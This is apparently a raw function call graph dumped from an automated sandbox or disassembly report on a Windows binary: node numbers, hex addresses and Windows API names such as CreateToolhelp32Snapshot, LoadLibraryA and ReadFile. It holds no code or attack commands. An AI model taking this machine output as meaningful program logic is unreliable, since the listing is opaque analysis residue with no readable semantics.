98399->98434 98400 261c9c 59 API calls 98400->98451 98401 261207 59 API calls 98401->98434 98402 2943a9 Sleep 98402->98434 98403 270fe6 59 API calls Mailbox 98403->98451 98406->98240 98407 25c324 timeGetTime 99786 255376 60 API calls 98407->99786 98408 27083e timeGetTime 98408->98434 98411 294440 GetExitCodeProcess 98416 29446c CloseHandle 98411->98416 98417 294456 WaitForSingleObject 98411->98417 98413 2d6562 110 API calls 98413->98434 98414 256d79 109 API calls 98414->98451 98416->98434 98417->98416 98417->98451 98418 256cd8 276 API calls 98418->98451 98420 255376 60 API calls 98420->98451 98421 2938aa Sleep 98421->98451 98422 2944c8 Sleep 98422->98451 98423 261a36 59 API calls 98423->98434 98428 253ea3 68 API calls 98428->98434 98429 25c26d 98433 261a36 59 API calls 98429->98433 98433->98386 98434->98399 98434->98401 98434->98406 98434->98408 98434->98411 98434->98413 98434->98421 98434->98422 98434->98423 98434->98428 98434->98451 99814 2b2baf 60 API calls 98434->99814 99815 255376 60 API calls 98434->99815 99816 256cd8 298 API calls 98434->99816 99857 2a70e2 59 API calls 98434->99857 99858 2b57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98434->99858 99859 2b4148 CreateToolhelp32Snapshot Process32FirstW 98434->99859 98436 2ba48d 89 API calls 98436->98451 98438 2539be 68 API calls 98438->98451 98439 261a36 59 API calls 98439->98451 98441 255190 59 API calls Mailbox 98441->98451 98442 2553b0 276 API calls 98442->98451 98443 2a6cf1 59 API calls Mailbox 98443->98451 98445 293e13 VariantClear 98445->98451 98446 2a7aad 59 API calls 98446->98451 98447 293ea9 VariantClear 98447->98451 98448 293c57 VariantClear 98448->98451 98449 2541c4 59 API calls Mailbox 98449->98451 98450 253ea3 68 API calls 98450->98451 98451->98386 98451->98393 98451->98395 98451->98396 98451->98399 98451->98400 98451->98402 98451->98403 98451->98406 98451->98407 98451->98414 98451->98418 98451->98420 98451->98429 98451->98434 98451->98436 98451->98438 98451->98439 98451->98441 98451->98442 98451->98443 98451->98445 98451->98446 98451->98447 98451->98448 98451->98449 98451->98450 98454 2642cf CloseHandle 98451->98454 99632 2552b0 98451->99632 99641 259a00 98451->99641 99648 259c80 98451->99648 99679 25a820 98451->99679 99696 2bbcd6 98451->99696 99726 2be4a0 98451->99726 99729 2ce60c 98451->99729 99732 2b412a 98451->99732 99735 2bc270 98451->99735 99742 25b020 98451->99742 99790 2d6655 59 API calls 98451->99790 99791 2ba058 59 API calls Mailbox 98451->99791 99792 2ae0aa 59 API calls 98451->99792 99793 254d37 98451->99793 99811 2a6c62 59 API calls 2 library calls 98451->99811 99812 2538ff 59 API calls 98451->99812 99813 253a40 59 API calls Mailbox 98451->99813 99817 2cc355 98451->99817 98454->98451 98459 265b25 98458->98459 98460 265ad5 _memset 98458->98460 98459->98242 98461 265af4 Shell_NotifyIconW 98460->98461 98461->98459 98462->98215 98463->98229 98465 281b70 __ftell_nolock 98464->98465 98466 2700dc GetModuleFileNameW 98465->98466 98467 261a36 59 API calls 98466->98467 98468 270102 98467->98468 98469 270284 60 API calls 98468->98469 98470 27010c Mailbox 98469->98470 98470->98236 98472 261a45 __wsetenvp _memmove 98471->98472 98473 270fe6 Mailbox 59 API calls 98472->98473 98474 261a83 98473->98474 98474->98241 98492 26542d __ftell_nolock 98491->98492 98493 261821 59 API calls 98492->98493 98499 265590 Mailbox 98492->98499 98495 26545f 98493->98495 98504 265495 Mailbox 98495->98504 98556 261609 98495->98556 98496 261609 59 API calls 98496->98504 98497 265563 98498 261a36 59 API calls 98497->98498 98497->98499 98500 265584 98498->98500 98499->98262 98502 264c94 59 API calls 98500->98502 98501 261a36 59 API calls 98501->98504 98502->98499 98504->98496 98504->98497 98504->98499 98504->98501 98559 264c94 98504->98559 98506 2619fb 98505->98506 98508 2619ee 98505->98508 98507 270fe6 Mailbox 59 API calls 98506->98507 98507->98508 98508->98264 98510 261ca7 98509->98510 98511 261caf 98509->98511 98565 261bcc 59 API calls 2 library calls 98510->98565 98513 25477a 98511->98513 98514 270fe6 Mailbox 59 API calls 98513->98514 98515 254787 98514->98515 98515->98269 98518 2539c9 98516->98518 98519 2539f0 98518->98519 98566 253ea3 98518->98566 98519->98272 98521 2655c6 98520->98521 98522 2655df 98520->98522 98523 261c9c 59 API calls 98521->98523 98524 261821 59 API calls 98522->98524 98525 264fa0 98523->98525 98524->98525 98526 27312d 98525->98526 98527 2731ae 98526->98527 98528 273139 98526->98528 98594 2731c0 60 API calls 3 library calls 98527->98594 98535 27315e 98528->98535 98592 278d58 58 API calls __getptd_noexit 98528->98592 98531 2731bb 98531->98282 98532 273145 98593 278fe6 9 API calls __cftof2_l 98532->98593 98534 273150 98534->98282 98535->98282 98537 2547c6 98536->98537 98538 270fe6 Mailbox 59 API calls 98537->98538 98539 2547d4 98538->98539 98541 2547e0 98539->98541 98595 2546ec 59 API calls Mailbox 98539->98595 98542 254540 98541->98542 98596 254650 98542->98596 98544 270fe6 Mailbox 59 API calls 98546 2545eb 98544->98546 98545 25454f 98545->98544 98545->98546 98547 2543d0 98546->98547 98548 28d6c9 98547->98548 98550 2543e7 98547->98550 98548->98550 98606 2540cb 59 API calls Mailbox 98548->98606 98551 2544ef 98550->98551 98552 254530 98550->98552 98553 2544e8 98550->98553 98551->98323 98605 25523c 59 API calls 98552->98605 98555 270fe6 Mailbox 59 API calls 98553->98555 98555->98551 98557 261aa4 59 API calls 98556->98557 98558 261614 98557->98558 98558->98495 98560 264ca2 98559->98560 98564 264cc4 _memmove 98559->98564 98563 270fe6 Mailbox 59 API calls 98560->98563 98561 270fe6 Mailbox 59 API calls 98562 264cd8 98561->98562 98562->98504 98563->98564 98564->98561 98565->98511 98582 253c30 98566->98582 98568 253eb3 98569 253f2d 98568->98569 98570 253ebd 98568->98570 98591 25523c 59 API calls 98569->98591 98571 270fe6 Mailbox 59 API calls 98570->98571 98573 253ece 98571->98573 98574 253edc 98573->98574 98575 261207 59 API calls 98573->98575 98576 253eeb 98574->98576 98589 261bcc 59 API calls 2 library calls 98574->98589 98575->98574 98578 270fe6 Mailbox 59 API calls 98576->98578 98579 253ef5 98578->98579 98590 253bc8 68 API calls 98579->98590 98581 253f1d 98581->98519 98583 253e11 98582->98583 98584 253c43 98582->98584 98583->98568 98585 261207 59 API calls 98584->98585 98588 253c54 98584->98588 98586 253e73 98585->98586 98587 272f70 __cinit 67 API calls 98586->98587 98587->98588 98588->98568 98589->98576 98590->98581 98591->98581 98592->98532 98593->98534 98594->98531 98595->98541 98597 254659 Mailbox 98596->98597 98598 28d6ec 98597->98598 98603 254663 98597->98603 98599 270fe6 Mailbox 59 API calls 98598->98599 98601 28d6f8 98599->98601 98600 25466a 98600->98545 98603->98600 98604 255190 59 API calls Mailbox 98603->98604 98604->98603 98605->98551 98606->98550 98669 281b70 98607->98669 98610 2702b0 98612 261821 59 API calls 98610->98612 98611 2702cd 98613 2619e1 59 API calls 98611->98613 98614 2702bc 98612->98614 98613->98614 98671 26133d 98614->98671 98617 2709c5 98618 281b70 __ftell_nolock 98617->98618 98619 2709d2 GetLongPathNameW 98618->98619 98620 261821 59 API calls 98619->98620 98621 2631f7 98620->98621 98622 262f3d 98621->98622 98623 261207 59 API calls 98622->98623 98624 262f4f 98623->98624 98625 270284 60 API calls 98624->98625 98626 262f5a 98625->98626 98627 262f65 98626->98627 98628 2a0177 98626->98628 98630 264c94 59 API calls 98627->98630 98632 2a0191 98628->98632 98681 26151f 98628->98681 98631 262f71 98630->98631 98675 251307 98631->98675 98634 262f84 Mailbox 98634->98339 98691 2649c2 98635->98691 98638 29f8d6 98808 2b9b16 98638->98808 98639 2649c2 136 API calls 98641 2627c3 98639->98641 98641->98638 98643 2627cb 98641->98643 98647 2627d7 98643->98647 98648 29f8f3 98643->98648 98644 29f908 98646 270fe6 Mailbox 59 API calls 98644->98646 98645 29f8eb 98866 264a2f 98645->98866 98668 29f94d Mailbox 98646->98668 98715 2629be 98647->98715 98872 2b47e8 90 API calls _wprintf 98648->98872 98652 29f901 98652->98644 98654 29fb01 98655 272f85 _free 58 API calls 98654->98655 98656 29fb09 98655->98656 98657 264a2f 84 API calls 98656->98657 98662 29fb12 98657->98662 98661 272f85 _free 58 API calls 98661->98662 98662->98661 98664 264a2f 84 API calls 98662->98664 98874 2aff5c 89 API calls 4 library calls 98662->98874 98664->98662 98665 261a36 59 API calls 98665->98668 98668->98654 98668->98662 98668->98665 98843 2afef8 98668->98843 98846 2b793a 98668->98846 98852 26343f 98668->98852 98860 263297 98668->98860 98873 2afe19 61 API calls 2 library calls 98668->98873 98670 270291 GetFullPathNameW 98669->98670 98670->98610 98670->98611 98672 26134b 98671->98672 98673 261981 59 API calls 98672->98673 98674 26135b 98673->98674 98674->98617 98676 251319 98675->98676 98680 251338 _memmove 98675->98680 98678 270fe6 Mailbox 59 API calls 98676->98678 98677 270fe6 Mailbox 59 API calls 98679 25134f 98677->98679 98678->98680 98679->98634 98680->98677 98684 2614db 98681->98684 98685 2614e9 CompareStringW 98684->98685 98690 29f210 98684->98690 98688 26150c 98685->98688 98687 29f25f 98688->98628 98689 274eb8 60 API calls 98689->98690 98690->98687 98690->98689 98875 264b29 98691->98875 98696 2a08bb 98699 264a2f 84 API calls 98696->98699 98697 2649ed LoadLibraryExW 98885 264ade 98697->98885 98700 2a08c2 98699->98700 98702 264ade 3 API calls 98700->98702 98704 2a08ca 98702->98704 98911 264ab2 98704->98911 98705 264a14 98705->98704 98706 264a20 98705->98706 98708 264a2f 84 API calls 98706->98708 98710 2627af 98708->98710 98710->98638 98710->98639 98712 2a08f1 98919 264a6e 98712->98919 98716 2629e7 98715->98716 98717 29fd14 98715->98717 99279 263df7 60 API calls Mailbox 98716->99279 99365 2aff5c 89 API calls 4 library calls 98717->99365 98720 29fd27 99366 2aff5c 89 API calls 4 library calls 98720->99366 98721 262a09 99280 263e47 98721->99280 98725 262a26 98727 261207 59 API calls 98725->98727 98726 29fd43 98730 262a93 98726->98730 98728 262a32 98727->98728 99291 270b8b 60 API calls __ftell_nolock 98728->99291 98732 262aa1 98730->98732 98733 29fd56 98730->98733 98731 262a3e 98734 261207 59 API calls 98731->98734 98736 261207 59 API calls 98732->98736 98735 2642cf CloseHandle 98733->98735 98737 262a4a 98734->98737 98738 29fd62 98735->98738 98739 262aaa 98736->98739 98740 270284 60 API calls 98737->98740 98741 2649c2 136 API calls 98738->98741 98742 261207 59 API calls 98739->98742 98743 262a58 98740->98743 98744 29fd7e 98741->98744 98745 262ab3 98742->98745 99292 263ea1 98743->99292 98748 29fda3 98744->98748 98752 2b9b16 122 API calls 98744->98752 99303 270119 98745->99303 99367 2aff5c 89 API calls 4 library calls 98748->99367 98749 262aca 98753 2617e0 59 API calls 98749->98753 98756 29fd96 98752->98756 98759 262adb SetCurrentDirectoryW 98753->98759 98754 29fdba 98786 262c3e Mailbox 98754->98786 98757 29fdbf 98756->98757 98758 29fd9e 98756->98758 98761 264a2f 84 API calls 98757->98761 98760 264a2f 84 API calls 98758->98760 98764 262aee Mailbox 98759->98764 98760->98748 98762 29fdc4 98761->98762 98763 270fe6 Mailbox 59 API calls 98762->98763 98770 29fdf8 98763->98770 98766 270fe6 Mailbox 59 API calls 98764->98766 98768 262b01 98766->98768 98767 2627ef 98767->98217 98767->98242 98769 26433f 59 API calls 98768->98769 98790 262b0c Mailbox __wsetenvp 98769->98790 98771 26343f 59 API calls 98770->98771 98783 29fe41 Mailbox 98771->98783 98772 262c19 99361 2642cf 98772->99361 98773 2a0032 99370 2b789a 98773->99370 98776 262c25 SetCurrentDirectoryW 98776->98786 98779 2a0054 99374 2bfc0d 59 API calls 2 library calls 98779->99374 98782 2a0061 98784 272f85 _free 58 API calls 98782->98784 98783->98773 98788 26343f 59 API calls 98783->98788 98798 2afef8 59 API calls 98783->98798 98799 261a36 59 API calls 98783->98799 98800 2b793a 59 API calls 98783->98800 98803 2a0084 98783->98803 99368 2afe19 61 API calls 2 library calls 98783->99368 99369 26314d 59 API calls Mailbox 98783->99369 98784->98786 99274 263e25 98786->99274 98788->98783 98789 2a00e4 98789->98772 98790->98772 98792 2a00c3 98790->98792 98795 261a36 59 API calls 98790->98795 98796 2a00cb 98790->98796 99354 263ebe 67 API calls _wcscpy 98790->99354 99355 262e8f GetStringTypeW 98790->99355 99356 262dfe 60 API calls __wcsnicmp 98790->99356 99357 262edc GetStringTypeW __wsetenvp 98790->99357 99358 27386d GetStringTypeW _iswctype 98790->99358 99359 2627fc 165 API calls 3 library calls 98790->99359 99360 26314d 59 API calls Mailbox 98790->99360 99376 2afdb2 59 API calls 4 library calls 98792->99376 98795->98790 99377 2aff5c 89 API calls 4 library calls 98796->99377 98798->98783 98799->98783 98800->98783 99375 2aff5c 89 API calls 4 library calls 98803->99375 98805 2a009d 98806 272f85 _free 58 API calls 98805->98806 98807 2a00b0 98806->98807 98807->98786 98809 264a8c 85 API calls 98808->98809 98810 2b9b85 98809->98810 99427 2b9cf1 98810->99427 98813 29f8e7 98813->98644 98813->98645 98814 264ab2 74 API calls 98815 2b9bb4 98814->98815 98816 264ab2 74 API calls 98815->98816 98817 2b9bc4 98816->98817 98818 264ab2 74 API calls 98817->98818 98819 2b9bdf 98818->98819 98820 264ab2 74 API calls 98819->98820 98821 2b9bfa 98820->98821 98822 264a8c 85 API calls 98821->98822 98823 2b9c11 98822->98823 98824 27593c std::exception::_Copy_str 58 API calls 98823->98824 98825 2b9c18 98824->98825 98826 27593c std::exception::_Copy_str 58 API calls 98825->98826 98827 2b9c22 98826->98827 98828 264ab2 74 API calls 98827->98828 98829 2b9c36 98828->98829 98830 2b96c4 GetSystemTimeAsFileTime 98829->98830 98831 2b9c49 98830->98831 98832 2b9c5e 98831->98832 98833 2b9c73 98831->98833 98834 272f85 _free 58 API calls 98832->98834 98835 2b9c79 98833->98835 98836 2b9cd8 98833->98836 98837 2b9c64 98834->98837 99433 2b90c1 98835->99433 98839 272f85 _free 58 API calls 98836->98839 98840 272f85 _free 58 API calls 98837->98840 98839->98813 98840->98813 98842 272f85 _free 58 API calls 98842->98813 98844 270fe6 Mailbox 59 API calls 98843->98844 98845 2aff28 _memmove 98844->98845 98845->98668 98847 2b7945 98846->98847 98848 270fe6 Mailbox 59 API calls 98847->98848 98849 2b795c 98848->98849 98850 2b796b 98849->98850 98851 261a36 59 API calls 98849->98851 98850->98668 98851->98850 98853 2634df 98852->98853 98859 263452 _memmove 98852->98859 98855 270fe6 Mailbox 59 API calls 98853->98855 98854 270fe6 Mailbox 59 API calls 98856 263459 98854->98856 98855->98859 98857 270fe6 Mailbox 59 API calls 98856->98857 98858 263482 98856->98858 98857->98858 98858->98668 98859->98854 98861 2632aa 98860->98861 98864 263358 98860->98864 98862 270fe6 Mailbox 59 API calls 98861->98862 98865 2632dc 98861->98865 98862->98865 98863 270fe6 59 API calls Mailbox 98863->98865 98864->98668 98865->98863 98865->98864 98867 264a40 98866->98867 98868 264a39 98866->98868 98870 264a60 FreeLibrary 98867->98870 98871 264a4f 98867->98871 98869 2755c6 __fcloseall 83 API calls 98868->98869 98869->98867 98870->98871 98871->98648 98872->98652 98873->98668 98874->98662 98924 264b77 98875->98924 98878 264b50 98880 264b60 FreeLibrary 98878->98880 98881 2649d4 98878->98881 98879 264b77 2 API calls 98879->98878 98880->98881 98882 27547b 98881->98882 98928 275490 98882->98928 98884 2649e1 98884->98696 98884->98697 99009 264baa 98885->99009 98888 264b03 98890 264b15 FreeLibrary 98888->98890 98891 264a05 98888->98891 98889 264baa 2 API calls 98889->98888 98890->98891 98892 2648b0 98891->98892 98893 270fe6 Mailbox 59 API calls 98892->98893 98894 2648c5 98893->98894 99013 26433f 98894->99013 98896 2648d1 _memmove 98897 2a080a 98896->98897 98898 26490c 98896->98898 98899 2a0817 98897->98899 99021 2b9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 98897->99021 98900 264a6e 69 API calls 98898->98900 99022 2b9f5e 95 API calls 98899->99022 98903 264915 98900->98903 98904 264ab2 74 API calls 98903->98904 98905 2a0859 98903->98905 98908 264a8c 85 API calls 98903->98908 98910 2649a0 98903->98910 98904->98903 99016 264a8c 98905->99016 98908->98903 98909 264ab2 74 API calls 98909->98910 98910->98705 98912 264ac4 98911->98912 98913 2a0945 98911->98913 99128 275802 98912->99128 98916 2b96c4 99253 2b951a 98916->99253 98918 2b96da 98918->98712 98920 2a0908 98919->98920 98921 264a7d 98919->98921 99258 275e80 98921->99258 98923 264a85 98925 264b44 98924->98925 98926 264b80 LoadLibraryA 98924->98926 98925->98878 98925->98879 98926->98925 98927 264b91 GetProcAddress 98926->98927 98927->98925 98929 27549c __ioinit 98928->98929 98930 2754af 98929->98930 98933 2754e0 98929->98933 98977 278d58 58 API calls __getptd_noexit 98930->98977 98932 2754b4 98978 278fe6 9 API calls __cftof2_l 98932->98978 98947 280718 98933->98947 98936 2754e5 98937 2754ee 98936->98937 98938 2754fb 98936->98938 98979 278d58 58 API calls __getptd_noexit 98937->98979 98940 275525 98938->98940 98941 275505 98938->98941 98962 280837 98940->98962 98980 278d58 58 API calls __getptd_noexit 98941->98980 98943 2754bf __ioinit @_EH4_CallFilterFunc@8 98943->98884 98948 280724 __ioinit 98947->98948 98949 279e3b __lock 58 API calls 98948->98949 98959 280732 98949->98959 98950 2807a6 98982 28082e 98950->98982 98951 2807ad 98987 278a4d 58 API calls 2 library calls 98951->98987 98954 280823 __ioinit 98954->98936 98955 2807b4 98955->98950 98988 27a05b InitializeCriticalSectionAndSpinCount 98955->98988 98957 279ec3 __mtinitlocknum 58 API calls 98957->98959 98959->98950 98959->98951 98959->98957 98985 276e7d 59 API calls __lock 98959->98985 98986 276ee7 LeaveCriticalSection LeaveCriticalSection _doexit 98959->98986 98960 2807da EnterCriticalSection 98960->98950 98971 280857 __wopenfile 98962->98971 98963 280871 98993 278d58 58 API calls __getptd_noexit 98963->98993 98964 280a2c 98964->98963 98969 280a8f 98964->98969 98966 280876 98994 278fe6 9 API calls __cftof2_l 98966->98994 98968 275530 98981 275552 LeaveCriticalSection LeaveCriticalSection __wfsopen 98968->98981 98990 2887d1 98969->98990 98971->98963 98971->98964 98971->98971 98995 2739fb 60 API calls 2 library calls 98971->98995 98973 280a25 98973->98964 98996 2739fb 60 API calls 2 library calls 98973->98996 98975 280a44 98975->98964 98997 2739fb 60 API calls 2 library calls 98975->98997 98977->98932 98978->98943 98979->98943 98980->98943 98981->98943 98989 279fa5 LeaveCriticalSection 98982->98989 98984 280835 98984->98954 98985->98959 98986->98959 98987->98955 98988->98960 98989->98984 98998 287fb5 98990->98998 98992 2887ea 98992->98968 98993->98966 98994->98968 98995->98973 98996->98975 98997->98964 98999 287fc1 __ioinit 98998->98999 99000 287fd7 98999->99000 99003 28800d 98999->99003 99001 278d58 __cftof2_l 58 API calls 99000->99001 99002 287fdc 99001->99002 99004 278fe6 __cftof2_l 9 API calls 99002->99004 99005 28807e __wsopen_nolock 109 API calls 99003->99005 99008 287fe6 __ioinit 99004->99008 99006 288029 99005->99006 99007 288052 __wsopen_helper LeaveCriticalSection 99006->99007 99007->99008 99008->98992 99010 264af7 99009->99010 99011 264bb3 LoadLibraryA 99009->99011 99010->98888 99010->98889 99011->99010 99012 264bc4 GetProcAddress 99011->99012 99012->99010 99014 270fe6 Mailbox 59 API calls 99013->99014 99015 264351 99014->99015 99015->98896 99017 2a0923 99016->99017 99018 264a9b 99016->99018 99023 275a6d 99018->99023 99020 264aa9 99020->98909 99021->98899 99022->98903 99024 275a79 __ioinit 99023->99024 99025 275a8b 99024->99025 99027 275ab1 99024->99027 99054 278d58 58 API calls __getptd_noexit 99025->99054 99036 276e3e 99027->99036 99028 275a90 99055 278fe6 9 API calls __cftof2_l 99028->99055 99035 275a9b __ioinit 99035->99020 99037 276e70 EnterCriticalSection 99036->99037 99038 276e4e 99036->99038 99040 275ab7 99037->99040 99038->99037 99039 276e56 99038->99039 99041 279e3b __lock 58 API calls 99039->99041 99042 2759de 99040->99042 99041->99040 99043 2759fc 99042->99043 99044 2759ec 99042->99044 99046 275a12 99043->99046 99057 275af0 99043->99057 99127 278d58 58 API calls __getptd_noexit 99044->99127 99086 274c5d 99046->99086 99047 2759f1 99056 275ae8 LeaveCriticalSection LeaveCriticalSection __wfsopen 99047->99056 99052 275a53 99099 28185f 99052->99099 99054->99028 99055->99035 99056->99035 99058 275afd __ftell_nolock 99057->99058 99059 275b15 99058->99059 99060 275b2d 99058->99060 99061 278d58 __cftof2_l 58 API calls 99059->99061 99062 274906 __flush 58 API calls 99060->99062 99063 275b1a 99061->99063 99065 275b35 99062->99065 99064 278fe6 __cftof2_l 9 API calls 99063->99064 99084 275b25 99064->99084 99066 28185f __write 64 API calls 99065->99066 99067 275b51 99066->99067 99070 275bd4 99067->99070 99071 275d41 99067->99071 99067->99084 99068 27c826 __except_handler4 6 API calls 99069 275e7c 99068->99069 99069->99046 99073 275bfa 99070->99073 99077 275cfd 99070->99077 99072 275d4a 99071->99072 99071->99077 99074 278d58 __cftof2_l 58 API calls 99072->99074 99075 2819f5 __lseeki64 62 API calls 99073->99075 99073->99084 99074->99084 99076 275c33 99075->99076 99079 275c5f ReadFile 99076->99079 99076->99084 99078 28185f __write 64 API calls 99077->99078 99077->99084 99080 275dae 99078->99080 99081 275c84 99079->99081 99079->99084 99082 28185f __write 64 API calls 99080->99082 99080->99084 99083 28185f __write 64 API calls 99081->99083 99082->99084 99085 275c97 99083->99085 99084->99068 99085->99084 99087 274c70 99086->99087 99091 274c94 99086->99091 99088 274906 __flush 58 API calls 99087->99088 99087->99091 99089 274c8d 99088->99089 99090 27dab6 __write 78 API calls 99089->99090 99090->99091 99092 274906 99091->99092 99093 274925 99092->99093 99094 274910 99092->99094 99093->99052 99095 278d58 __cftof2_l 58 API calls 99094->99095 99096 274915 99095->99096 99097 278fe6 __cftof2_l 9 API calls 99096->99097 99098 274920 99097->99098 99098->99052 99100 28186b __ioinit 99099->99100 99101 281878 99100->99101 99102 28188f 99100->99102 99104 278d24 __dosmaperr 58 API calls 99101->99104 99103 28192e 99102->99103 99105 2818a3 99102->99105 99106 278d24 __dosmaperr 58 API calls 99103->99106 99107 28187d 99104->99107 99108 2818cb 99105->99108 99109 2818c1 99105->99109 99110 2818c6 99106->99110 99111 278d58 __cftof2_l 58 API calls 99107->99111 99114 27d436 ___lock_fhandle 59 API calls 99108->99114 99113 278d24 __dosmaperr 58 API calls 99109->99113 99116 278d58 __cftof2_l 58 API calls 99110->99116 99112 281884 __ioinit 99111->99112 99112->99047 99113->99110 99115 2818d1 99114->99115 99117 2818e4 99115->99117 99118 2818f7 99115->99118 99119 28193a 99116->99119 99120 28194e __lseek_nolock 62 API calls 99117->99120 99122 278d58 __cftof2_l 58 API calls 99118->99122 99121 278fe6 __cftof2_l 9 API calls 99119->99121 99125 2818f0 99120->99125 99121->99112 99123 2818fc 99122->99123 99124 278d24 __dosmaperr 58 API calls 99123->99124 99124->99125 99126 281926 __write LeaveCriticalSection 99125->99126 99126->99112 99127->99047 99131 27581d 99128->99131 99130 264ad5 99130->98916 99132 275829 __ioinit 99131->99132 99133 27583f _memset 99132->99133 99134 27586c 99132->99134 99135 275864 __ioinit 99132->99135 99158 278d58 58 API calls __getptd_noexit 99133->99158 99136 276e3e __lock_file 59 API calls 99134->99136 99135->99130 99138 275872 99136->99138 99144 27563d 99138->99144 99139 275859 99159 278fe6 9 API calls __cftof2_l 99139->99159 99147 275658 _memset 99144->99147 99151 275673 99144->99151 99145 275663 99249 278d58 58 API calls __getptd_noexit 99145->99249 99147->99145 99147->99151 99156 2756b3 99147->99156 99148 275668 99250 278fe6 9 API calls __cftof2_l 99148->99250 99160 2758a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 99151->99160 99152 2757c4 _memset 99252 278d58 58 API calls __getptd_noexit 99152->99252 99154 274906 __flush 58 API calls 99154->99156 99156->99151 99156->99152 99156->99154 99161 28108b 99156->99161 99229 280dd7 99156->99229 99251 280ef8 58 API calls 3 library calls 99156->99251 99158->99139 99159->99135 99160->99135 99162 2810ac 99161->99162 99163 2810c3 99161->99163 99164 278d24 __dosmaperr 58 API calls 99162->99164 99165 2817fb 99163->99165 99170 2810fd 99163->99170 99167 2810b1 99164->99167 99166 278d24 __dosmaperr 58 API calls 99165->99166 99168 281800 99166->99168 99169 278d58 __cftof2_l 58 API calls 99167->99169 99171 278d58 __cftof2_l 58 API calls 99168->99171 99174 2810b8 99169->99174 99172 281105 99170->99172 99178 28111c 99170->99178 99173 281111 99171->99173 99175 278d24 __dosmaperr 58 API calls 99172->99175 99177 278fe6 __cftof2_l 9 API calls 99173->99177 99174->99156 99176 28110a 99175->99176 99180 278d58 __cftof2_l 58 API calls 99176->99180 99177->99174 99178->99174 99179 281131 99178->99179 99182 28114b 99178->99182 99183 281169 99178->99183 99181 278d24 __dosmaperr 58 API calls 99179->99181 99180->99173 99181->99176 99182->99179 99187 281156 99182->99187 99184 278a4d __malloc_crt 58 API calls 99183->99184 99185 281179 99184->99185 99188 28119c 99185->99188 99189 281181 99185->99189 99186 285e9b __read_nolock 58 API calls 99190 28126a 99186->99190 99187->99186 99193 281af1 __lseeki64_nolock 60 API calls 99188->99193 99191 278d58 __cftof2_l 58 API calls 99189->99191 99192 2812e3 ReadFile 99190->99192 99197 281280 GetConsoleMode 99190->99197 99194 281186 99191->99194 99195 2817c3 GetLastError 99192->99195 99196 281305 99192->99196 99193->99187 99198 278d24 __dosmaperr 58 API calls 99194->99198 99199 2817d0 99195->99199 99200 2812c3 99195->99200 99196->99195 99204 2812d5 99196->99204 99201 2812e0 99197->99201 99202 281294 99197->99202 99198->99174 99203 278d58 __cftof2_l 58 API calls 99199->99203 99206 2812c9 99200->99206 99207 278d37 __dosmaperr 58 API calls 99200->99207 99201->99192 99202->99201 99205 28129a ReadConsoleW 99202->99205 99208 2817d5 99203->99208 99204->99206 99211 28133a 99204->99211 99216 2815a7 99204->99216 99205->99204 99209 2812bd GetLastError 99205->99209 99206->99174 99212 272f85 _free 58 API calls 99206->99212 99207->99206 99210 278d24 __dosmaperr 58 API calls 99208->99210 99209->99200 99210->99206 99214 2813a6 ReadFile 99211->99214 99217 281427 99211->99217 99212->99174 99218 2813c7 GetLastError 99214->99218 99226 2813d1 99214->99226 99215 2816ad ReadFile 99221 2816d0 GetLastError 99215->99221 99228 2816de 99215->99228 99216->99206 99216->99215 99217->99206 99219 2814e4 99217->99219 99220 2814d4 99217->99220 99223 281494 MultiByteToWideChar 99217->99223 99218->99226 99219->99223 99224 281af1 __lseeki64_nolock 60 API calls 99219->99224 99222 278d58 __cftof2_l 58 API calls 99220->99222 99221->99228 99222->99206 99223->99206 99223->99209 99224->99223 99225 281af1 __lseeki64_nolock 60 API calls 99225->99226 99226->99211 99226->99225 99227 281af1 __lseeki64_nolock 60 API calls 99227->99228 99228->99216 99228->99227 99230 280de2 99229->99230 99234 280df7 99229->99234 99231 278d58 __cftof2_l 58 API calls 99230->99231 99232 280de7 99231->99232 99233 278fe6 __cftof2_l 9 API calls 99232->99233 99242 280df2 99233->99242 99235 280e2c 99234->99235 99236 286214 __getbuf 58 API calls 99234->99236 99234->99242 99237 274906 __flush 58 API calls 99235->99237 99236->99235 99238 280e40 99237->99238 99239 280f77 __read 72 API calls 99238->99239 99240 280e47 99239->99240 99241 274906 __flush 58 API calls 99240->99241 99240->99242 99243 280e6a 99241->99243 99242->99156 99243->99242 99244 274906 __flush 58 API calls 99243->99244 99245 280e76 99244->99245 99245->99242 99246 274906 __flush 58 API calls 99245->99246 99247 280e83 99246->99247 99248 274906 __flush 58 API calls 99247->99248 99248->99242 99249->99148 99250->99151 99251->99156 99252->99148 99256 27542a GetSystemTimeAsFileTime 99253->99256 99255 2b9529 99255->98918 99257 275458 __aulldiv 99256->99257 99257->99255 99259 275e8c __ioinit 99258->99259 99260 275eb3 99259->99260 99261 275e9e 99259->99261 99262 276e3e __lock_file 59 API calls 99260->99262 99271 278d58 58 API calls __getptd_noexit 99261->99271 99264 275eb9 99262->99264 99266 275af0 __ftell_nolock 67 API calls 99264->99266 99265 275ea3 99272 278fe6 9 API calls __cftof2_l 99265->99272 99268 275ec4 99266->99268 99273 275ee4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99268->99273 99270 275eae __ioinit 99270->98923 99271->99265 99272->99270 99273->99270 99275 2642cf CloseHandle 99274->99275 99276 263e2d Mailbox 99275->99276 99277 2642cf CloseHandle 99276->99277 99278 263e3c 99277->99278 99278->98767 99279->98721 99281 2642cf CloseHandle 99280->99281 99282 263e53 99281->99282 99378 2642f9 99282->99378 99284 263e72 99288 262a1e 99284->99288 99386 263c61 62 API calls Mailbox 99284->99386 99286 263e84 99387 26389f 99286->99387 99288->98720 99288->98725 99291->98731 99403 264220 99292->99403 99295 26410a 99296 264124 99295->99296 99297 2a06cc 99296->99297 99298 2641ab SetFilePointerEx 99296->99298 99302 26417f 99296->99302 99411 2642ae SetFilePointerEx 99297->99411 99410 2642ae SetFilePointerEx 99298->99410 99301 2a06e6 99302->98730 99304 261207 59 API calls 99303->99304 99305 27012f 99304->99305 99306 261207 59 API calls 99305->99306 99307 270137 99306->99307 99308 261207 59 API calls 99307->99308 99309 27013f 99308->99309 99310 261207 59 API calls 99309->99310 99311 270147 99310->99311 99312 2a627d 99311->99312 99313 27017b 99311->99313 99314 261c9c 59 API calls 99312->99314 99315 261462 59 API calls 99313->99315 99316 2a6286 99314->99316 99317 270189 99315->99317 99318 2619e1 59 API calls 99316->99318 99319 261981 59 API calls 99317->99319 99322 2701be 99318->99322 99320 270193 99319->99320 99320->99322 99323 261462 59 API calls 99320->99323 99321 2701fe 99412 261462 99321->99412 